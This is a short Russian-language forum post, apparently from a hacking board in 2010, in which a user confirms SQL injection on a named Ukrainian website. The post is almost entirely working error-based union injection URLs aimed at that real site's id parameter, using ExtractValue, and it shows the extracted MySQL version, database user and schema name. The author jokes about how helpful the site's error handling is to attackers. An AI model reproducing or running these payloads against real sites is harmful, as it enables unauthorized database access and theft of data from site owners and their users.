29.05.2010, 01:00
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
С нами:
9509918
Репутация:
30
|
|
да
http://topgir.com.ua/?id=908 and 1=1
http://topgir.com.ua/?id=908 and 1=(select 1,2) --+ [ обработка ошибок просто мечта хакира : )))) ]
на вопрос ответ дан на 100% : ))))
Добавлено через 23 минуты
стало любопытно:
http://topgir.com.ua/?id=908 union select ExtractValue(1,concat(0x5C,(version()))),2,3,4,5,6--+
=>
5.1.32-log
http://topgir.com.ua/?id=908 union select ExtractValue(1,concat(0x5C,(user()))),2,3,4,5,6--+
=>
topgir@localhost
http://topgir.com.ua/?id=908 union select ExtractValue(1,concat(0x5C,(select schema_name FROM INFORMATION_SCHEMA.schemata limit 1,1)))--+
=>
topgir |
|
|